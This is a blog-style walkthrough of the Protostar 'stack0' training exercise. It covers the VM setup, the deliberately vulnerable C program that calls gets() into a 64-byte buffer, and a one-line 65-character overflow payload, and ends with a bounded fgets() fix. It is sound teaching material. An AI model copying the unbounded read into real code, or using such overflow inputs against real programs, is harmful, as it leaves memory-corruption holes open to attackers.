Protostar vm, stack0

I decided it was time to upgrade my current knowledge on software security as I have a great interest in that domain.

To do so, I’ll try to solve the Protostar VM from exploit-exercises.com.

In this series of articles I’ll explain my findings on each exercise.

First, let’s set-up our environment.

I’m using VirtualBox to run the VM. I activated port forwarding in the network options in order to use ssh and not worry about VirtualBox.

So in network options, add a rule with :
tcp, name:ssh, host port: 2222, guest port:22

You can leave the rest blank.

Boot the VM; once you’ve done that, you’re all set.

You can now connect through ssh using user/user :

~ david$ ssh -p 2222 user@127.0.0.1

Let’s switch to bash, and go to the right directory :

$ bash
user@protostar:~$ cd /opt/protostar/bin/
user@protostar:/opt/protostar/bin$

Here is the source of the vulnerable program :

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>

int main(int argc, char **argv)
{
    volatile int modified;
    char buffer[64];

    modified = 0;
    gets(buffer);

    if(modified != 0) {
        printf("you have changed the 'modified' variable\n");
    } else {
        printf("Try again?\n");
    }
}

It’s vulnerable to a simple buffer overflow. If we write a value too big for the buffer, say 65 chars, the program will write the extra data into the next stack variable, ‘modified’, and thus we’ll change its value.

Let’s test that :

user@protostar:/opt/protostar/bin$ python -c 'print 65*"A"' | ./stack0 
you have changed the 'modified' variable

Bingo !
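
For comparison, here is the same program with gets() replaced by a bounded fgets() read, so the 65-character input above can no longer reach ‘modified’. This is an added example, not part of the original exercise; the names BUF_SIZE, read_line_bounded and stack0_hardened are assumptions made for illustration.

```c
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 64   /* same size as 'buffer' in stack0 */

/* Bounded replacement for gets(): stores at most size-1 bytes plus a NUL.
 * Returns the stored length (-1 on EOF) and flags input that did not fit. */
static int read_line_bounded(FILE *in, char *buf, size_t size, int *truncated)
{
    size_t len;
    int c;

    *truncated = 0;
    if (fgets(buf, (int)size, in) == NULL)
        return -1;
    len = strlen(buf);
    if (len > 0 && buf[len - 1] == '\n') {
        buf[--len] = '\0';              /* whole line fit: strip newline */
    } else {
        /* Line was cut short: drain the remainder so it is not read later. */
        while ((c = fgetc(in)) != '\n' && c != EOF)
            *truncated = 1;
    }
    return (int)len;
}

/* stack0 with the same locals but a bounded read; returns final 'modified'. */
static int stack0_hardened(FILE *in, int *truncated)
{
    volatile int modified;
    char buffer[BUF_SIZE];

    modified = 0;
    (void)read_line_bounded(in, buffer, sizeof buffer, truncated);
    return modified;
}

int main(void)
{
    int truncated;
    int modified = stack0_hardened(stdin, &truncated);

    if (truncated)
        fprintf(stderr, "input exceeded %d bytes, rest discarded\n", BUF_SIZE - 1);
    puts(modified != 0 ? "you have changed the 'modified' variable" : "Try again?");
    return 0;
}
```

Fed the same 65 ‘A’ characters, this version prints "Try again?" and reports the truncation on stderr.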

See you at the next exercise.